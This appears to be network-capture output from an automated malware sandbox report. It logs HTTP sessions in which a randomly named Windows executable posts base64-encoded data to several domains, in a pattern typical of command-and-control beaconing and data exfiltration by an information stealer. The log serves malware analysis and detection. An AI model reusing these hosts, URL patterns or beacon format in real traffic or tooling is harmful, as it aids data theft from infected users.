f6 50 48 [TRUNCATED]
                    Data Ascii: 189}QKO0Wz7C&HE(hbx3!' '1Mcg_onbrq4K2bs&$!Y~/qZr)R|V}cplxXU*!6pBNI+MteRFSYj[7|QqY3k|G;,^{NPPouvw2O7.e(O~Nt^,G|cu#?qFw=<vPHw3Nmy2nzlB8`a1l`mur0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    4192.168.2.449742217.160.0.106802008C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exe
                    TimestampBytes transferredDirectionData
                    Aug 12, 2024 05:13:53.964392900 CEST508OUTGET /qe66/?YXDT=dnvLceXALBk3Hr4+RUpDuj1gE1lZ37++NG0MGchlNc+FfqCdFLzpUNQMmrv30qtrBi93uCjMcFA24SebHgOv/zqChZDwQ/s0nTN9cl2J79+sQIZRijKLgDM=&ZH3=yf1H3v6h HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                    Accept-Language: en-us
                    Host: www.catherineviskadi.com
                    Connection: close
                    User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                    Aug 12, 2024 05:13:54.608198881 CEST770INHTTP/1.1 404 Not Found
                    Content-Type: text/html
                    Content-Length: 626
                    Connection: close
                    Date: Mon, 12 Aug 2024 03:13:54 GMT
                    Server: Apache
                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 [TRUNCATED]
                    Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404 - Not found </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> Error 404 - Not found </h1> <p style="font-size:0.8em;"> Your browser can't find the document corresponding to the URL you typed in. </p> </body></html>


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    5192.168.2.449744208.91.197.27802008C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exe
                    TimestampBytes transferredDirectionData
                    Aug 12, 2024 05:14:16.213109970 CEST786OUTPOST /xzzi/ HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                    Accept-Language: en-us
                    Accept-Encoding: gzip, deflate, br
                    Host: www.bfiworkerscomp.com
                    Origin: http://www.bfiworkerscomp.com
                    Cache-Control: max-age=0
                    Connection: close
                    Content-Type: application/x-www-form-urlencoded
                    Content-Length: 201
                    Referer: http://www.bfiworkerscomp.com/xzzi/
                    User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                    Data Raw: 59 58 44 54 3d 77 41 37 79 63 45 49 75 2b 6f 76 49 35 39 72 66 31 37 61 31 55 4f 5a 4d 67 47 38 38 71 50 57 30 74 56 59 38 77 6e 46 75 57 76 5a 6f 63 31 2b 36 77 2b 43 4c 4c 58 74 7a 67 2f 31 58 4c 56 69 70 4a 2f 34 48 56 58 2f 4d 67 67 48 48 68 4d 4a 75 6b 52 76 6d 51 4a 70 46 4c 67 5a 72 7a 6b 4f 4a 63 62 68 34 34 76 67 78 64 64 51 30 68 38 52 59 6c 33 68 50 66 30 53 41 58 4a 37 56 50 6b 4c 37 64 30 41 75 61 67 62 77 64 44 57 34 4b 34 53 46 6e 37 54 52 75 6b 74 6b 79 76 53 49 37 38 45 54 44 4c 72 77 45 67 4b 5a 55 48 57 71 63 4e 61 63 4d 38 76 73 75 5a 2b 48 6b 42 51 71 69 61 4d 62 6a 67 3d 3d
                    Data Ascii: YXDT=wA7ycEIu+ovI59rf17a1UOZMgG88qPW0tVY8wnFuWvZoc1+6w+CLLXtzg/1XLVipJ/4HVX/MggHHhMJukRvmQJpFLgZrzkOJcbh44vgxddQ0h8RYl3hPf0SAXJ7VPkL7d0AuagbwdDW4K4SFn7TRuktkyvSI78ETDLrwEgKZUHWqcNacM8vsuZ+HkBQqiaMbjg==


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    6192.168.2.449745208.91.197.27802008C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exe
                    TimestampBytes transferredDirectionData
                    Aug 12, 2024 05:14:18.749522924 CEST806OUTPOST /xzzi/ HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                    Accept-Language: en-us
                    Accept-Encoding: gzip, deflate, br
                    Host: www.bfiworkerscomp.com
                    Origin: http://www.bfiworkerscomp.com
                    Cache-Control: max-age=0
                    Connection: close
                    Content-Type: application/x-www-form-urlencoded
                    Content-Length: 221
                    Referer: http://www.bfiworkerscomp.com/xzzi/
                    User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                    Data Raw: 59 58 44 54 3d 77 41 37 79 63 45 49 75 2b 6f 76 49 37 64 62 66 6d 4d 4f 31 46 65 59 2b 6c 47 38 38 6b 66 57 76 74 56 55 38 77 6d 42 2b 57 35 78 6f 63 55 4f 36 78 2f 43 4c 49 58 74 7a 31 50 31 53 50 56 69 33 4a 2f 38 50 56 53 48 4d 67 67 44 48 68 4a 31 75 6b 41 76 35 52 5a 70 44 44 41 5a 74 33 6b 4f 4a 63 62 68 34 34 76 46 55 64 5a 30 30 68 50 5a 59 33 69 56 4d 57 55 53 44 57 4a 37 56 59 55 4c 2f 64 30 41 51 61 68 33 4b 64 42 75 34 4b 35 69 46 67 75 7a 53 68 6b 74 6d 76 2f 54 47 71 74 74 39 47 2b 4f 42 50 42 71 36 61 46 65 71 51 72 4c 47 64 4e 4f 37 38 5a 61 30 35 47 5a 65 76 5a 78 53 34 76 78 43 4e 4e 47 72 33 70 4b 4e 43 74 54 4b 49 56 45 42 77 76 73 3d
                    Data Ascii: YXDT=wA7ycEIu+ovI7dbfmMO1FeY+lG88kfWvtVU8wmB+W5xocUO6x/CLIXtz1P1SPVi3J/8PVSHMggDHhJ1ukAv5RZpDDAZt3kOJcbh44vFUdZ00hPZY3iVMWUSDWJ7VYUL/d0AQah3KdBu4K5iFguzShktmv/TGqtt9G+OBPBq6aFeqQrLGdNO78Za05GZevZxS4vxCNNGr3pKNCtTKIVEBwvs=


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    7192.168.2.449746208.91.197.27802008C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exe
                    TimestampBytes transferredDirectionData
                    Aug 12, 2024 05:14:21.291794062 CEST10888OUTPOST /xzzi/ HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                    Accept-Language: en-us
                    Accept-Encoding: gzip, deflate, br
                    Host: www.bfiworkerscomp.com
                    Origin: http://www.bfiworkerscomp.com
                    Cache-Control: max-age=0
                    Connection: close
                    Content-Type: application/x-www-form-urlencoded
                    Content-Length: 10301
                    Referer: http://www.bfiworkerscomp.com/xzzi/
                    User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                    Data Raw: 59 58 44 54 3d 77 41 37 79 63 45 49 75 2b 6f 76 49 37 64 62 66 6d 4d 4f 31 46 65 59 2b 6c 47 38 38 6b 66 57 76 74 56 55 38 77 6d 42 2b 57 35 4a 6f 63 6d 71 36 78 63 36 4c 4a 58 74 7a 70 66 31 54 50 56 6a 79 4a 37 51 4c 56 54 36 78 67 69 4c 48 67 72 4e 75 7a 45 7a 35 66 70 70 44 63 51 5a 73 7a 6b 4f 51 63 62 78 30 34 76 31 55 64 5a 30 30 68 4a 39 59 6e 48 68 4d 61 30 53 41 58 4a 37 5a 50 6b 4c 48 64 30 4a 72 61 68 43 39 64 31 61 34 4c 5a 79 46 69 64 62 53 6f 6b 74 67 73 2f 53 62 71 74 78 2b 47 36 76 2b 50 42 65 41 61 48 43 71 54 64 6a 61 48 39 36 50 76 49 71 59 37 32 78 4f 72 4a 34 54 37 38 78 58 4e 63 36 63 69 74 50 75 41 2f 71 68 66 67 55 77 70 36 2f 35 62 34 5a 41 73 69 49 33 61 68 79 32 58 59 43 6c 73 75 59 6f 4c 52 57 38 47 58 6c 66 46 4a 51 69 52 57 39 4a 42 69 71 48 4b 61 6f 4b 36 49 77 39 7a 4b 71 64 6a 72 44 57 31 5a 46 4b 44 54 57 43 7a 4d 71 62 39 6e 64 65 54 6b 62 65 41 51 75 41 45 6c 51 49 6e 44 6a 34 73 45 77 49 37 71 45 71 51 45 6f 2f 34 30 48 74 4c 52 34 63 50 45 43 49 74 6d 46 4a 7a [TRUNCATED]
                    Data Ascii: YXDT=wA7ycEIu+ovI7dbfmMO1FeY+lG88kfWvtVU8wmB+W5Jocmq6xc6LJXtzpf1TPVjyJ7QLVT6xgiLHgrNuzEz5fppDcQZszkOQcbx04v1UdZ00hJ9YnHhMa0SAXJ7ZPkLHd0JrahC9d1a4LZyFidbSoktgs/Sbqtx+G6v+PBeAaHCqTdjaH96PvIqY72xOrJ4T78xXNc6citPuA/qhfgUwp6/5b4ZAsiI3ahy2XYClsuYoLRW8GXlfFJQiRW9JBiqHKaoK6Iw9zKqdjrDW1ZFKDTWCzMqb9ndeTkbeAQuAElQInDj4sEwI7qEqQEo/40HtLR4cPECItmFJz8q2d6pU4Ll7VU2sZsAI1N9jsSxu+eTj6YbKXJv8fXXQqvG3BbGJskhF9Ve/wnRYhL+vXXqZZNGcGKVV7oYforgpXJpV3bcZ7DCMeRW7Q4foENPhAjoU1k/cFL2mm9gvpNiCf9X3hjL7s24pdlVzpUBejJjFPnHCKCLtRG8Qg2CQkZVaQe1zHyLzOMYQoYnUmTRlCeEKfq3CRh32Ny3Ni9lv8d+qKbPpzr/5XQKeEO3VWB6H0w96rKUdeKp7EoPDK2c/T03xZ9XKxqd47zb5IXLF0gw1CqvJoxn4C0BzUPdwFbrGTNJ7LEZyjUs1OgzEVCU+NYuhfr1wLdGLMIliXxTxIQ4XNR2rQzj+I1Su0kk1PiIl1P7lYqE1W8q7cpo3do02/UjfJugRn+Z3T4OqN905CBUBc40YcJjXZVlxb6yt0SulegB5Vyqw0Tkv5hbbxvtVC46sNp4Lg+/5tJTQW6EyDP5ReN2c/SOL9Qw/R9yo8Bk2QsMcpuIeWbe6f9fRkuy+olxap3NUgeloDC00V39WiomQYDqW1N+FpmL3yF9wb9tS0EzK7kFus2Mv/5VI365zo1jlEyxmNbHS04P9WqPbVzcBxdz1bCjN+OrYYRhDeL4DEjI19X+KLct1xHqmHD1cEqqeaEC7VViPP16JAXO8lYaiE6AnBA0 [TRUNCATED]


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    8192.168.2.449747208.91.197.27802008C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exe
                    TimestampBytes transferredDirectionData
                    Aug 12, 2024 05:14:23.824186087 CEST506OUTGET /xzzi/?ZH3=yf1H3v6h&YXDT=9CTSfwlM5YWl8fvbrbSkFth60mtnncbW1FpC9VokAvwkUHOJycf2DDxLp9tWLELwEKEPfCC2oiLqmqE9jQi/S4FmCg8fmWLidol7jMU2H7Flt+5ZogJ/ZG4= HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                    Accept-Language: en-us
                    Host: www.bfiworkerscomp.com
                    Connection: close
                    User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                    Aug 12, 2024 05:14:25.277790070 CEST1236INHTTP/1.1 200 OK
                    Date: Mon, 12 Aug 2024 03:14:05 GMT
                    Server: Apache
                    Referrer-Policy: no-referrer-when-downgrade
                    Accept-CH: Sec-CH-Save-Data, Sec-CH-DPR, Sec-CH-Width, Sec-CH-Viewport-Width, Sec-CH-Viewport-Height, Sec-CH-Device-Memory, Sec-CH-RTT, Sec-CH-Downlink, Sec-CH-ECT, Sec-CH-Prefers-Color-Scheme, Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version
                    Permissions-Policy: ch-ua-platform-version=("https://dts.gnpge.com"), ch-ua-model=("https://dts.gnpge.com")
                    Set-Cookie: vsid=932vr47097804579346985; expires=Sat, 11-Aug-2029 03:14:05 GMT; Max-Age=157680000; path=/; domain=www.bfiworkerscomp.com; HttpOnly
                    X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_X4bWqCCfjNgRCWoEtCaPqxQfxqmLJzCS2YlulDCgrTKlTlLWQ4lbIdEEDNbN/CJfwm9vAlUE0fESHuO3NdrVzg==
                    Content-Length: 2630
                    Content-Type: text/html; charset=UTF-8
                    Connection: close
                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4b 58 37 34 69 78 70 7a 56 79 58 62 4a 70 72 63 4c 66 62 48 34 70 73 50 34 2b 4c 32 65 6e 74 71 72 69 30 6c 7a 68 36 70 6b 41 61 58 4c 50 49 63 63 6c 76 36 44 51 42 65 4a 4a 6a 47 46 57 72 42 49 46 36 51 4d 79 46 77 58 54 35 43 43 52 79 6a 53 32 70 65 6e 45 43 41 77 45 41 41 51 3d 3d 5f 58 34 62 57 71 43 43 66 6a 4e 67 52 43 57 6f 45 74 43 61 50 71 78 51 66 78 71 6d 4c 4a 7a 43 53 32 59 6c 75 6c 44 43 67 72 54 4b 6c 54 6c 4c 57 51 34 6c 62 49 64 45 45 44 4e 62 4e 2f 43 4a 66 77 6d 39 76 41 6c 55 45 30 66 45
                    Data Ascii: <!DOCTYPE html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_X4bWqCCfjNgRCWoEtCaPqxQfxqmLJzCS2YlulDCgrTKlTlLWQ4lbIdEEDNbN/CJfwm9vAlUE0fE
                    Aug 12, 2024 05:14:25.277841091 CEST1236INData Raw: 53 48 75 4f 33 4e 64 72 56 7a 67 3d 3d 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 76 61 72 20 61 62 70 3b 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74
                    Data Ascii: SHuO3NdrVzg=="><head><script type="text/javascript">var abp;</script><script type="text/javascript" src="http://www.bfiworkerscomp.com/px.js?ch=1"></script><script type="text/javascript" src="http://www.bfiworkerscomp.com/px.js?ch=2"></scr
                    Aug 12, 2024 05:14:25.277877092 CEST413INData Raw: 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 57 22 20 6e 61 6d 65 3d 22 65 78 70 69 72 65 73 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 2c 20 61 6c 6c 22 20 6e 61 6d
                    Data Ascii: <meta content="NOW" name="expires"> <meta content="index, follow, all" name="GOOGLEBOT"> <meta content="index, follow, all" name="robots"> ... Following Meta-Tag fixes scaling-issues on mobile devices --> <meta content=
                    Aug 12, 2024 05:14:25.277923107 CEST737INData Raw: 74 22 3e 0d 0a 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 0d 0a 20 20 20 20 20 20 20 20 27 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63
                    Data Ascii: t"> document.write( '<script type="text/javascript" language="JavaScript"' + 'src="//sedoparking.com/frmpark/' + window.location.host + '/' + 'Skenzor7' + '/park.js?reg_logo=netsol-logo.png&amp


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    9192.168.2.44974843.252.167.188802008C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exe
                    TimestampBytes transferredDirectionData
                    Aug 12, 2024 05:14:40.244437933 CEST792OUTPOST /rm91/ HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                    Accept-Language: en-us
                    Accept-Encoding: gzip, deflate, br
                    Host: www.xn--fhq1c541j0zr.com
                    Origin: http://www.xn--fhq1c541j0zr.com
                    Cache-Control: max-age=0
                    Connection: close
                    Content-Type: application/x-www-form-urlencoded
                    Content-Length: 201
                    Referer: http://www.xn--fhq1c541j0zr.com/rm91/
                    User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                    Data Raw: 59 58 44 54 3d 75 51 31 62 6f 4f 54 4a 37 76 49 39 46 51 39 4f 55 2b 34 35 30 6c 42 42 64 6a 79 59 48 6a 6f 39 48 38 38 2f 6f 48 34 55 49 52 59 57 32 68 2b 37 42 37 64 54 2f 68 52 48 33 42 62 73 58 65 78 30 70 63 4b 46 2f 54 32 52 47 5a 78 6d 68 42 79 6b 50 78 54 6a 4c 73 49 63 76 33 48 77 73 68 51 6f 2b 2f 65 61 75 73 4d 70 4b 79 43 5a 34 50 44 2f 53 72 4f 6a 70 4d 57 52 4b 46 67 53 53 41 43 5a 2b 6b 61 64 6d 6f 69 67 41 59 50 42 38 46 76 68 64 70 57 68 6a 38 36 4c 70 45 53 68 32 7a 35 73 50 42 45 45 45 38 4f 65 58 67 67 4b 66 79 41 63 45 31 64 46 65 67 71 6e 77 43 46 69 53 34 59 6c 4a 77 3d 3d
                    Data Ascii: YXDT=uQ1boOTJ7vI9FQ9OU+450lBBdjyYHjo9H88/oH4UIRYW2h+7B7dT/hRH3BbsXex0pcKF/T2RGZxmhBykPxTjLsIcv3HwshQo+/eausMpKyCZ4PD/SrOjpMWRKFgSSACZ+kadmoigAYPB8FvhdpWhj86LpESh2z5sPBEEE8OeXggKfyAcE1dFegqnwCFiS4YlJw==
                    Aug 12, 2024 05:14:41.119555950 CEST367INHTTP/1.1 404 Not Found
                    Date: Mon, 12 Aug 2024 03:22:04 GMT
                    Server: Apache
                    Content-Length: 203
                    Connection: close
                    Content-Type: text/html; charset=iso-8859-1
                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 72 6d 39 31 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /rm91/ was not found on this server.</p></body></html>


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    10192.168.2.44974943.252.167.188802008C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exe
                    TimestampBytes transferredDirectionData
                    Aug 12, 2024 05:14:42.776278019 CEST812OUTPOST /rm91/ HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                    Accept-Language: en-us
                    Accept-Encoding: gzip, deflate, br
                    Host: www.xn--fhq1c541j0zr.com
                    Origin: http://www.xn--fhq1c541j0zr.com
                    Cache-Control: max-age=0
                    Connection: close
                    Content-Type: application/x-www-form-urlencoded
                    Content-Length: 221
                    Referer: http://www.xn--fhq1c541j0zr.com/rm91/
                    User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                    Data Raw: 59 58 44 54 3d 75 51 31 62 6f 4f 54 4a 37 76 49 39 4b 54 6c 4f 57 63 51 35 6a 56 42 4f 52 44 79 59 49 44 6f 78 48 38 77 2f 6f 47 74 4a 49 45 49 57 33 46 36 37 43 2f 42 54 38 68 52 48 38 68 62 54 5a 2b 78 2f 70 63 33 6d 2f 53 61 52 47 5a 31 6d 68 41 43 6b 4d 43 37 6b 52 63 49 61 32 6e 48 75 7a 78 51 6f 2b 2f 65 61 75 73 49 51 4b 30 71 5a 35 36 4c 2f 54 4f 79 69 33 63 57 57 65 56 67 53 57 41 43 56 2b 6b 61 2f 6d 73 37 50 41 61 48 42 38 46 66 68 54 63 6a 33 74 38 36 4e 6e 6b 54 6c 34 47 64 6f 57 68 6c 50 62 63 57 62 64 41 6f 57 65 30 52 47 56 45 38 53 4d 67 4f 55 74 46 4d 57 66 37 6c 73 53 78 49 78 41 69 4e 77 71 43 45 7a 38 35 2f 37 7a 71 57 34 66 70 77 3d
                    Data Ascii: YXDT=uQ1boOTJ7vI9KTlOWcQ5jVBORDyYIDoxH8w/oGtJIEIW3F67C/BT8hRH8hbTZ+x/pc3m/SaRGZ1mhACkMC7kRcIa2nHuzxQo+/eausIQK0qZ56L/TOyi3cWWeVgSWACV+ka/ms7PAaHB8FfhTcj3t86NnkTl4GdoWhlPbcWbdAoWe0RGVE8SMgOUtFMWf7lsSxIxAiNwqCEz85/7zqW4fpw=
                    Aug 12, 2024 05:14:43.637432098 CEST367INHTTP/1.1 404 Not Found
                    Date: Mon, 12 Aug 2024 03:22:07 GMT
                    Server: Apache
                    Content-Length: 203
                    Connection: close
                    Content-Type: text/html; charset=iso-8859-1
                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 72 6d 39 31 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /rm91/ was not found on this server.</p></body></html>


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    11192.168.2.44975043.252.167.188802008C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exe
                    TimestampBytes transferredDirectionData
                    Aug 12, 2024 05:14:45.309333086 CEST10894OUTPOST /rm91/ HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                    Accept-Language: en-us
                    Accept-Encoding: gzip, deflate, br
                    Host: www.xn--fhq1c541j0zr.com
                    Origin: http://www.xn--fhq1c541j0zr.com
                    Cache-Control: max-age=0
                    Connection: close
                    Content-Type: application/x-www-form-urlencoded
                    Content-Length: 10301
                    Referer: http://www.xn--fhq1c541j0zr.com/rm91/
                    User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                    Data Raw: 59 58 44 54 3d 75 51 31 62 6f 4f 54 4a 37 76 49 39 4b 54 6c 4f 57 63 51 35 6a 56 42 4f 52 44 79 59 49 44 6f 78 48 38 77 2f 6f 47 74 4a 49 48 6f 57 33 77 75 37 41 65 42 54 39 68 52 48 78 42 62 57 5a 2b 78 75 70 63 66 36 2f 53 47 6e 47 63 70 6d 6a 69 36 6b 59 6a 37 6b 45 4d 49 61 35 48 48 76 73 68 51 35 2b 2f 50 54 75 74 34 51 4b 30 71 5a 35 39 37 2f 58 62 4f 69 31 63 57 52 4b 46 67 57 53 41 44 41 2b 6b 44 49 6d 73 76 6c 56 36 6e 42 6c 6c 50 68 65 4f 37 33 79 4d 36 50 6d 55 54 44 34 47 59 32 57 69 42 6c 62 66 4b 78 64 43 30 57 66 78 51 41 41 6e 73 61 54 6d 65 51 32 6b 6f 4d 45 63 4a 38 62 43 38 2f 44 67 56 73 38 43 77 58 78 4c 69 46 32 61 36 37 62 74 66 66 39 34 41 56 65 53 50 64 45 43 76 35 70 6c 41 61 42 70 6a 49 2f 76 72 59 67 2f 49 35 4f 33 31 63 52 45 39 66 36 59 6b 35 62 4d 7a 51 72 2b 49 4a 37 58 54 4e 31 6d 4a 50 32 33 70 61 4e 65 70 68 2f 53 74 41 66 59 43 54 35 48 59 6d 32 35 59 6f 47 76 78 70 76 30 74 4e 64 74 51 43 72 43 55 39 62 61 31 55 6c 79 56 72 36 34 47 62 49 39 58 48 4c 69 7a 74 30 [TRUNCATED]
